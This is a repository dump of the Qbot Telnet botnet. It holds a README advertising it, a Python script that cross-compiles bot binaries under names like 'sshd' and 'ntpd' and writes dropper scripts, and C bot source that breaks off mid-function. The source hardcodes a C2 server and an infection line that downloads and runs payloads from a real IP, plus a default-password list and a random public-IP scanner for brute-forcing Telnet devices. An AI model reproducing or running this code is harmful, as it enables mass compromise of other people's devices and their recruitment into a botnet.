[ { "path": "README.md", "content": "# qbot\nQbot Botnet. Telnet botnet, most powerfull and strong botnet. requirements: 2 linux server.\n" }, { "path": "cc7.py.txt", "content": "#Python auto cross compiler by void\r\n\r\nimport subprocess, sys\r\n\r\nif len(sys.argv[2]) != 0:\r\n ip = sys.argv[2]\r\nelse:\r\n print(\"\\x1b[0;31mIncorrect Usage!\")\r\n print(\"\\x1b[0;32mUsage: python \" + sys.argv[0] + \" \\x1b[0m\")\r\n exit(1)\r\n \r\nbot = sys.argv[1]\r\n\r\nyourafag = raw_input(\"Get arch's? Y/n:\")\r\nif yourafag.lower() == \"y\":\r\n get_arch = True\r\nelse:\r\n get_arch = False\r\n\r\ncompileas = [\"ntpd\", #mips\r\n \"sshd\", #mipsel\r\n \"openssh\", #sh4\r\n \"bash\", #x86\r\n \"tftp\", #Armv6l\r\n \"wget\", #i686\r\n \"cron\", #ppc\r\n \"ftp\", #i586\r\n \"pftp\", #m68k\r\n \"sh\",\r\n\t\t\t \"' '\",\r\n\t\t\t \"apache2\",\r\n\t\t\t \"telnetd\"]\r\n\r\ngetarch = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2',\r\n'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2',\r\n'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2',\r\n'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2',\r\n'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2',\r\n'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc-440fp.tar.bz2']\r\n\r\nccs = [\"cross-compiler-mips\",\r\n \"cross-compiler-mipsel\",\r\n \"cross-compiler-sh4\",\r\n \"cross-compiler-x86_64\",\r\n \"cross-compiler-armv6l\",\r\n \"cross-compiler-i686\",\r\n \"cross-compiler-powerpc\",\r\n \"cross-compiler-i586\",\r\n \"cross-compiler-m68k\",\r\n \"cross-compiler-sparc\",\r\n \"cross-compiler-armv4l\",\r\n \"cross-compiler-armv5l\",\r\n \"cross-compiler-powerpc-440fp\"]\r\n\r\ndef run(cmd):\r\n subprocess.call(cmd, shell=True)\r\n\r\nrun(\"rm -rf /var/www/html/* /var/lib/tftpboot/* /var/ftp/*\")\r\n\r\nif get_arch == True:\r\n run(\"rm -rf cross-compiler-*\")\r\n\r\n print(\"Downloading Architectures\")\r\n\r\n for arch in getarch:\r\n run(\"wget \" + arch + \" --no-check-certificate >> /dev/null\")\r\n run(\"tar -xvf *tar.bz2\")\r\n run(\"rm -rf *tar.bz2\")\r\n\r\n print(\"Cross Compilers Downloaded...\")\r\n\r\nnum = 0\r\nfor cc in ccs:\r\n arch = cc.split(\"-\")[2]\r\n run(\"./\"+cc+\"/bin/\"+arch+\"-gcc -static -pthread -D\" + arch.upper() + \" -o \" + compileas[num] + \" \" + bot + \" > /dev/null\")\r\n num += 1\r\n\r\nprint(\"Cross Compiling Done!\")\r\nprint(\"Setting up your httpd and tftp\")\r\n\r\nrun(\"yum install httpd -y\")\r\nrun(\"service httpd start\")\r\nrun(\"yum install xinetd tftp tftp-server -y\")\r\nrun(\"yum install vsftpd -y\")\r\nrun(\"service vsftpd start\")\r\n\r\nrun('''echo -e \"# default: off\r\n# description: The tftp server serves files using the trivial file transfer \\\r\n# protocol. The tftp protocol is often used to boot diskless \\\r\n# workstations, download configuration files to network-aware printers, \\\r\n# and to start the installation process for some operating systems.\r\nservice tftp\r\n{\r\n socket_type = dgram\r\n protocol = udp\r\n wait = yes\r\n user = root\r\n server = /usr/sbin/in.tftpd\r\n server_args = -s -c /var/lib/tftpboot\r\n disable = no\r\n per_source = 11\r\n cps = 100 2\r\n flags = IPv4\r\n}\r\n\" > /etc/xinetd.d/tftp''')\r\nrun(\"service xinetd start\")\r\n\r\nrun('''echo -e \"listen=YES\r\nlocal_enable=NO\r\nanonymous_enable=YES\r\nwrite_enable=NO\r\nanon_root=/var/ftp\r\nanon_max_rate=2048000\r\nxferlog_enable=YES\r\nlisten_address='''+ ip +'''\r\nlisten_port=21\" > /etc/vsftpd/vsftpd-anon.conf''')\r\nrun(\"service vsftpd restart\")\r\n\r\nfor i in compileas:\r\n run(\"cp \" + i + \" /var/www/html\")\r\n run(\"cp \" + i + \" /var/ftp\")\r\n run(\"mv \" + i + \" /var/lib/tftpboot\")\r\n\r\nrun('echo -e \"#!/bin/bash\" > /var/lib/tftpboot/tftp1.sh')\r\n\r\nrun('echo -e \"ulimit -n 1024\" >> /var/lib/tftpboot/tftp1.sh')\r\n\r\nrun('echo -e \"cp /bin/busybox /tmp/\" >> /var/lib/tftpboot/tftp1.sh')\r\n\r\nrun('echo -e \"#!/bin/bash\" > /var/lib/tftpboot/tftp2.sh')\r\n\r\nrun('echo -e \"ulimit -n 1024\" >> /var/lib/tftpboot/tftp2.sh')\r\n\r\nrun('echo -e \"cp /bin/busybox /tmp/\" >> /var/lib/tftpboot/tftp2.sh')\r\n\r\nrun('echo -e \"#!/bin/bash\" > /var/www/html/bins.sh')\r\n\r\nfor i in compileas:\r\n run('echo -e \"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/' + i + '; chmod +x ' + i + '; ./' + i + '; rm -rf ' + i + '\" >> /var/www/html/bins.sh')\r\n run('echo -e \"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' ' + i + ' ' + i + '; chmod 777 ' + i + ' ./' + i + '; rm -rf ' + i + '\" >> /var/ftp/ftp1.sh')\r\n run('echo -e \"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get ' + i + ';cat ' + i + ' >badbox;chmod +x *;./badbox\" >> /var/lib/tftpboot/tftp1.sh')\r\n run('echo -e \"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ' + i + ' -g ' + ip + ';cat ' + i + ' >badbox;chmod +x *;./badbox\" >> /var/lib/tftpboot/tftp2.sh')\r\n\r\nrun(\"service xinetd restart\")\r\nrun(\"service httpd restart\")\r\nrun('echo -e \"ulimit -n 99999\" >> ~/.bashrc')\r\n\r\nprint(\"\\x1b[0;32mSuccessfully cross compiled!\\x1b[0m\")\r\nprint(\"\\x1b[0;32mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://\" + ip + \"/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp \" + ip + \" -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g \" + ip + \"; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 \" + ip + \" ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\\x1b[0m\")\r\nprint\r\nprint(\"\\x1b[0;32mCoded By Void\\x1b[0m\")\r\n\r\n" }, { "path": "client.c", "content": "#define PR_SET_NAME 15\n#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))\n#define PAD_RIGHT 1\n#define PAD_ZERO 2\n#define PRINT_BUF_LEN 12\n#define CMD_IAC 255\n#define CMD_WILL 251\n#define CMD_WONT 252\n#define CMD_DO 253\n#define CMD_DONT 254\n#define OPT_SGA 3\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\nchar *infectline = \"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.206.225.136/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.206.225.136 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.206.225.136; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.206.225.136 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit\\r\\n\";\n\n// WGET LINE GOES HERE ^\n\nunsigned char *commServer[] =\n{\n \"5.206.225.136:23\"\n};\n\nint initConnection();\nint getBogos(unsigned char *bogomips);\nint getCores();\nint getCountry(unsigned char *buf, int bufsize);\nvoid makeRandomStr(unsigned char *buf, int length);\nint sockprintf(int sock, char *formatStr, ...);\nchar *inet_ntoa(struct in_addr in);\n\nint mainCommSock = 0, currentServer = -1, gotIP = 0;\nuint32_t *pids;\nuint32_t scanPid;\nuint64_t numpids = 0;\nstruct in_addr ourIP;\nunsigned char macAddress[6] = {0};\nchar *usernames[] = {\"root\\0\", \"admin\\0\", \"user\\0\", \"login\\0\", \"guest\\0\", \"support\\0\"};\nchar *passwords[] = {\"root\\0\", \"toor\\0\", \"admin\\0\", \"user\\0\", \"guest\\0\", \"login\\0\", \"changeme\\0\", \"1234\\0\", \"12345\\0\", \"123456\\0\", \"default\\0\", \"\\0\", \"password\\0\", \"support\\0\"};\n\n#define PHI 0x9e3779b9\nstatic uint32_t Q[4096], c = 362436;\n\nvoid init_rand(uint32_t x)\n{\n int i;\n\n Q[0] = x;\n Q[1] = x + PHI;\n Q[2] = x + PHI + PHI;\n\n for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;\n}\n\nuint32_t rand_cmwc(void)\n{\n uint64_t t, a = 18782LL;\n static uint32_t i = 4095;\n uint32_t x, r = 0xfffffffe;\n i = (i + 1) & 4095;\n t = a * Q[i] + c;\n c = (uint32_t)(t >> 32);\n x = t + c;\n if (x < c) {\n x++;\n c++;\n }\n return (Q[i] = r - x);\n}\n\nvoid trim(char *str)\n{\n int i;\n int begin = 0;\n int end = strlen(str) - 1;\n\n while (isspace(str[begin])) begin++;\n\n while ((end >= begin) && isspace(str[end])) end--;\n for (i = begin; i <= end; i++) str[i - begin] = str[i];\n\n str[i - begin] = '\\0';\n}\n\nstatic void printchar(unsigned char **str, int c)\n{\n if (str) {\n **str = c;\n ++(*str);\n }\n else (void)write(1, &c, 1);\n}\n\nstatic int prints(unsigned char **out, const unsigned char *string, int width, int pad)\n{\n register int pc = 0, padchar = ' ';\n\n if (width > 0) {\n register int len = 0;\n register const unsigned char *ptr;\n for (ptr = string; *ptr; ++ptr) ++len;\n if (len >= width) width = 0;\n else width -= len;\n if (pad & PAD_ZERO) padchar = '0';\n }\n if (!(pad & PAD_RIGHT)) {\n for ( ; width > 0; --width) {\n printchar (out, padchar);\n ++pc;\n }\n }\n for ( ; *string ; ++string) {\n printchar (out, *string);\n ++pc;\n }\n for ( ; width > 0; --width) {\n printchar (out, padchar);\n ++pc;\n }\n\n return pc;\n}\n\nstatic int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)\n{\n unsigned char print_buf[PRINT_BUF_LEN];\n register unsigned char *s;\n register int t, neg = 0, pc = 0;\n register unsigned int u = i;\n\n if (i == 0) {\n print_buf[0] = '0';\n print_buf[1] = '\\0';\n return prints (out, print_buf, width, pad);\n }\n\n if (sg && b == 10 && i < 0) {\n neg = 1;\n u = -i;\n }\n\n s = print_buf + PRINT_BUF_LEN-1;\n *s = '\\0';\n\n while (u) {\n t = u % b;\n if( t >= 10 )\n t += letbase - '0' - 10;\n *--s = t + '0';\n u /= b;\n }\n\n if (neg) {\n if( width && (pad & PAD_ZERO) ) {\n printchar (out, '-');\n ++pc;\n --width;\n }\n else {\n *--s = '-';\n }\n }\n\n return pc + prints (out, s, width, pad);\n}\n\nstatic int print(unsigned char **out, const unsigned char *format, va_list args )\n{\n register int width, pad;\n register int pc = 0;\n unsigned char scr[2];\n\n for (; *format != 0; ++format) {\n if (*format == '%') {\n ++format;\n width = pad = 0;\n if (*format == '\\0') break;\n if (*format == '%') goto out;\n if (*format == '-') {\n ++format;\n pad = PAD_RIGHT;\n }\n while (*format == '0') {\n ++format;\n pad |= PAD_ZERO;\n }\n for ( ; *format >= '0' && *format <= '9'; ++format) {\n width *= 10;\n width += *format - '0';\n }\n if( *format == 's' ) {\n register char *s = (char *)va_arg( args, int );\n pc += prints (out, s?s:\"(null)\", width, pad);\n continue;\n }\n if( *format == 'd' ) {\n pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');\n continue;\n }\n if( *format == 'x' ) {\n pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');\n continue;\n }\n if( *format == 'X' ) {\n pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');\n continue;\n }\n if( *format == 'u' ) {\n pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');\n continue;\n }\n if( *format == 'c' ) {\n scr[0] = (unsigned char)va_arg( args, int );\n scr[1] = '\\0';\n pc += prints (out, scr, width, pad);\n continue;\n }\n }\n else {\nout:\n printchar (out, *format);\n ++pc;\n }\n }\n if (out) **out = '\\0';\n va_end( args );\n return pc;\n}\n\nint zprintf(const unsigned char *format, ...)\n{\n va_list args;\n va_start( args, format );\n return print( 0, format, args );\n}\n\nint szprintf(unsigned char *out, const unsigned char *format, ...)\n{\n va_list args;\n va_start( args, format );\n return print( &out, format, args );\n}\n\n\nint sockprintf(int sock, char *formatStr, ...)\n{\n unsigned char *textBuffer = malloc(2048);\n memset(textBuffer, 0, 2048);\n char *orig = textBuffer;\n va_list args;\n va_start(args, formatStr);\n print(&textBuffer, formatStr, args);\n va_end(args);\n orig[strlen(orig)] = '\\n';\n zprintf(\"buf: %s\\n\", orig);\n int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);\n free(orig);\n return q;\n}\n\nstatic int *fdopen_pids;\n\nint fdpopen(unsigned char *program, register unsigned char *type)\n{\n register int iop;\n int pdes[2], fds, pid;\n\n if (*type != 'r' && *type != 'w' || type[1]) return -1;\n\n if (pipe(pdes) < 0) return -1;\n if (fdopen_pids == NULL) {\n if ((fds = getdtablesize()) <= 0) return -1;\n if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;\n memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));\n }\n\n switch (pid = vfork())\n {\n case -1:\n close(pdes[0]);\n close(pdes[1]);\n return -1;\n case 0:\n if (*type == 'r') {\n if (pdes[1] != 1) {\n dup2(pdes[1], 1);\n close(pdes[1]);\n }\n close(pdes[0]);\n } else {\n if (pdes[0] != 0) {\n (void) dup2(pdes[0], 0);\n (void) close(pdes[0]);\n }\n (void) close(pdes[1]);\n }\n execl(\"/bin/sh\", \"sh\", \"-c\", program, NULL);\n _exit(127);\n }\n if (*type == 'r') {\n iop = pdes[0];\n (void) close(pdes[1]);\n } else {\n iop = pdes[1];\n (void) close(pdes[0]);\n }\n fdopen_pids[iop] = pid;\n return (iop);\n}\n\nint fdpclose(int iop)\n{\n register int fdes;\n sigset_t omask, nmask;\n int pstat;\n register int pid;\n\n if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);\n (void) close(iop);\n sigemptyset(&nmask);\n sigaddset(&nmask, SIGINT);\n sigaddset(&nmask, SIGQUIT);\n sigaddset(&nmask, SIGHUP);\n (void) sigprocmask(SIG_BLOCK, &nmask, &omask);\n do {\n pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);\n } while (pid == -1 && errno == EINTR);\n (void) sigprocmask(SIG_SETMASK, &omask, NULL);\n fdopen_pids[fdes] = 0;\n return (pid == -1 ? -1 : WEXITSTATUS(pstat));\n}\n\nunsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)\n{\n int got = 1, total = 0;\n while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\\n') { got = read(fd, buffer + total, 1); total++; }\n return got == 0 ? NULL : buffer;\n}\n\nstatic const long hextable[] = {\n [0 ... 255] = -1,\n ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,\n ['A'] = 10, 11, 12, 13, 14, 15,\n ['a'] = 10, 11, 12, 13, 14, 15\n};\n\nlong parseHex(unsigned char *hex)\n{\n long ret = 0;\n while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];\n return ret;\n}\n\nint wildString(const unsigned char* pattern, const unsigned char* string) {\n switch(*pattern)\n {\n case '\\0': return *string;\n case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));\n case '?': return !(*string && !wildString(pattern+1, string+1));\n default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));\n }\n}\n\nint getHost(unsigned char *toGet, struct in_addr *i)\n{\n struct hostent *h;\n if((i->s_addr = inet_addr(toGet)) == -1) return 1;\n return 0;\n}\n\nvoid uppercase(unsigned char *str)\n{\n while(*str) { *str = toupper(*str); str++; }\n}\n\nint getBogos(unsigned char *bogomips)\n{\n int cmdline = open(\"/proc/cpuinfo\", O_RDONLY);\n char linebuf[4096];\n while(fdgets(linebuf, 4096, cmdline) != NULL)\n {\n uppercase(linebuf);\n if(strstr(linebuf, \"BOGOMIPS\") == linebuf)\n {\n unsigned char *pos = linebuf + 8;\n while(*pos == ' ' || *pos == '\\t' || *pos == ':') pos++;\n while(pos[strlen(pos)-1] == '\\r' || pos[strlen(pos)-1] == '\\n') pos[strlen(pos)-1]=0;\n if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;\n strcpy(bogomips, pos);\n close(cmdline);\n return 0;\n }\n memset(linebuf, 0, 4096);\n }\n close(cmdline);\n return 1;\n}\n\nint getCores()\n{\n int totalcores = 0;\n int cmdline = open(\"/proc/cpuinfo\", O_RDONLY);\n char linebuf[4096];\n while(fdgets(linebuf, 4096, cmdline) != NULL)\n {\n uppercase(linebuf);\n if(strstr(linebuf, \"BOGOMIPS\") == linebuf) totalcores++;\n memset(linebuf, 0, 4096);\n }\n close(cmdline);\n return totalcores;\n\n}\n\nvoid makeRandomStr(unsigned char *buf, int length)\n{\n int i = 0;\n for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;\n}\n\nint recvLine(int socket, unsigned char *buf, int bufsize)\n{\n memset(buf, 0, bufsize);\n\n fd_set myset;\n struct timeval tv;\n tv.tv_sec = 30;\n tv.tv_usec = 0;\n FD_ZERO(&myset);\n FD_SET(socket, &myset);\n int selectRtn, retryCount;\n if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {\n while(retryCount < 10)\n {\n sockprintf(mainCommSock, \"PING\");\n\n tv.tv_sec = 30;\n tv.tv_usec = 0;\n FD_ZERO(&myset);\n FD_SET(socket, &myset);\n if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {\n retryCount++;\n continue;\n }\n\n break;\n }\n }\n\n unsigned char tmpchr;\n unsigned char *cp;\n int count = 0;\n\n cp = buf;\n while(bufsize-- > 1)\n {\n if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {\n *cp = 0x00;\n return -1;\n }\n *cp++ = tmpchr;\n if(tmpchr == '\\n') break;\n count++;\n }\n *cp = 0x00;\n\n// zprintf(\"recv: %s\\n\", cp);\n\n return count;\n}\n\nint connectTimeout(int fd, char *host, int port, int timeout)\n{\n struct sockaddr_in dest_addr;\n fd_set myset;\n struct timeval tv;\n socklen_t lon;\n\n int valopt;\n long arg = fcntl(fd, F_GETFL, NULL);\n arg |= O_NONBLOCK;\n fcntl(fd, F_SETFL, arg);\n\n dest_addr.sin_family = AF_INET;\n dest_addr.sin_port = htons(port);\n if(getHost(host, &dest_addr.sin_addr)) return 0;\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));\n\n if (res < 0) {\n if (errno == EINPROGRESS) {\n tv.tv_sec = timeout;\n tv.tv_usec = 0;\n FD_ZERO(&myset);\n FD_SET(fd, &myset);\n if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {\n lon = sizeof(int);\n getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);\n if (valopt) return 0;\n }\n else return 0;\n }\n else return 0;\n }\n\n arg = fcntl(fd, F_GETFL, NULL);\n arg &= (~O_NONBLOCK);\n fcntl(fd, F_SETFL, arg);\n\n return 1;\n}\n\nint listFork()\n{\n uint32_t parent, *newpids, i;\n parent = fork();\n if (parent <= 0) return parent;\n numpids++;\n newpids = (uint32_t*)malloc((numpids + 1) * 4);\n for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];\n newpids[numpids - 1] = parent;\n free(pids);\n pids = newpids;\n return parent;\n}\n\nint negotiate(int sock, unsigned char *buf, int len)\n{\n unsigned char c;\n\n switch (buf[1]) {\n case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;\n case CMD_WILL:\n case CMD_WONT:\n case CMD_DO:\n case CMD_DONT:\n c = CMD_IAC;\n send(sock, &c, 1, MSG_NOSIGNAL);\n if (CMD_WONT == buf[1]) c = CMD_DONT;\n else if (CMD_DONT == buf[1]) c = CMD_WONT;\n else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);\n else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);\n send(sock, &c, 1, MSG_NOSIGNAL);\n send(sock, &(buf[2]), 1, MSG_NOSIGNAL);\n break;\n\n default:\n break;\n }\n\n return 0;\n}\n\nint matchPrompt(char *bufStr)\n{\n char *prompts = \":>%$#\\0\";\n\n int bufLen = strlen(bufStr);\n int i, q = 0;\n for(i = 0; i < strlen(prompts); i++)\n {\n while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\\r' || *(bufStr + bufLen - q) == '\\n')) q++;\n if(*(bufStr + bufLen - q) == prompts[i]) return 1;\n }\n\n return 0;\n}\n\nint readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)\n{\n int bufferUsed = initialIndex, got = 0, found = 0;\n fd_set myset;\n struct timeval tv;\n tv.tv_sec = timeout;\n tv.tv_usec = timeoutusec;\n unsigned char *initialRead = NULL;\n\n while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))\n {\n FD_ZERO(&myset);\n FD_SET(fd, &myset);\n if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;\n initialRead = buffer + bufferUsed;\n got = recv(fd, initialRead, 1, 0);\n if(got == -1 || got == 0) return 0;\n bufferUsed += got;\n if(*initialRead == 0xFF)\n {\n got = recv(fd, initialRead + 1, 2, 0);\n if(got == -1 || got == 0) return 0;\n bufferUsed += got;\n if(!negotiate(fd, initialRead, 3)) return 0;\n } else {\n if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }\n }\n }\n\n if(found) return 1;\n return 0;\n}\n\nstatic uint8_t ipState[5];\nin_addr_t getRandomPublicIP()\n{\n\tif(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)\n {\n ipState[1]++;\n\t\tipState[2]++;\n\t\tipState[3]++;\n\t\tipState[4]++;\n char ip[16];\n szprintf(ip, \"%d.%d.%d.%d\", ipState[1], ipState[2], ipState[3], ipState[4]);\n\t\treturn inet_addr(ip);\n }\n\n\tipState[1] = 0;\n\tipState[2] = 0;\n ipState[3] = 0;\n\tipState[4] = 0;\n while(\n (ipState[1] == 0) ||\n (ipState[1] == 10) ||\n (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||\n (ipState[1] == 127) ||\n (ipState[1] == 169 && ipState[2] == 254) ||\n (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||\n (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||\n (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||\n (ipState[1] == 192 && ipState[2] == 168) ||\n (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||\n (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||\n (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||\n (ipState[1] >= 224)\n )\n {\n ipState[1] = rand() % 150;\n \tipState[2] = rand() % 150;\n \tipState[3] = rand() % 150;\n\t\tipState[4] = rand() % 150;\n }\n\n\tchar ip[16];\n szprintf(ip, \"%d.%d.%d.%d\", ipState[1], ipState[2], ipState[3], ipState[4]);\n\treturn inet_addr(ip);\n}\n\nin_addr_t getRandomIP(in_addr_t netmask)\n{\n in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;\n return tmp ^ ( rand_cmwc() & ~netmask);\n}\n\nunsigned short csum (unsigned short *buf, int count)\n{\n register uint64_t sum = 0;\n while( count > 1 ) { sum += *buf++; count -= 2; }\n if(count > 0) { sum += *(unsigned char *)buf; }\n while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }\n return (uint16_t)(~sum);\n}\n\nunsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)\n{\n\n struct tcp_pseudo\n {\n unsigned long src_addr;\n unsigned long dst_addr;\n unsigned char zero;\n unsigned char proto;\n unsigned short length;\n } pseudohead;\n unsigned short total_len = iph->tot_len;\n pseudohead.src_addr=iph->saddr;\n pseudohead.dst_addr=iph->daddr;\n pseudohead.zero=0;\n pseudohead.proto=IPPROTO_TCP;\n pseudohead.length=htons(sizeof(struct tcphdr));\n int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);\n unsigned short *tcp = malloc(totaltcp_len);\n memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));\n memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));\n unsigned short output = csum(tcp,totaltcp_len);\n free(tcp);\n return output;\n}\n\nvoid makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)\n{\n iph->ihl = 5;\n iph->version = 4;\n iph->tos = 0;\n iph->tot_len = sizeof(struct iphdr) + packetSize;\n iph->id = rand_cmwc();\n iph->frag_off = 0;\n iph->ttl = MAXTTL;\n iph->protocol = protocol;\n iph->check = 0;\n iph->saddr = source;\n iph->daddr = dest;\n}\n\nint sclose(int fd)\n{\n if(3 > fd) return 1;\n close(fd);\n return 0;\n}\n\nvoid StartTheLelz()\n{\n int max = (getdtablesize() / 4) * 3, i, res;\n fd_set myset;\n struct timeval tv;\n socklen_t lon;\n int valopt;\n\n max = max > 4096 ? 4096 : max;\n\n struct sockaddr_in dest_addr;\n dest_addr.sin_family = AF_INET;\n dest_addr.sin_port = htons(23);\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n\n struct telstate_t\n {\n int fd;\n uint32_t ip;\n uint8_t state;\n uint8_t complete;\n uint8_t usernameInd;\n uint8_t passwordInd;\n uint32_t totalTimeout;\n uint16_t bufUsed;\n char *sockbuf;\n } fds[max];\n memset(fds, 0, max * (sizeof(int) + 1));\n for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }\n \tstruct timeval timeout;\n \ttimeout.tv_sec = 5;\n \ttimeout.tv_usec = 0;\n while(1)\n {\n for(i = 0; i < max; i++)\n {\n switch(fds[i].state)\n {\n case 0:\n {\n memset(fds[i].sockbuf, 0, 1024);\n\n if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }\n else {\n fds[i].passwordInd++;\n if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }\n if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }\n }\n dest_addr.sin_family = AF_INET;\n dest_addr.sin_port = htons(23);\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n dest_addr.sin_addr.s_addr = fds[i].ip;\n fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);\n setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));\n setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));\n if(fds[i].fd == -1) { continue; }\n fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);\n if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf(\"close %lu\\n\",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; }\n else { fds[i].state = 1; fds[i].totalTimeout = 0; }\n }\n break;\n\n case 1:\n {\n if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);\n\n FD_ZERO(&myset);\n FD_SET(fds[i].fd, &myset);\n tv.tv_sec = 0;\n tv.tv_usec = 10000;\n res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);\n if(res == 1)\n {\n lon = sizeof(int);\n valopt = 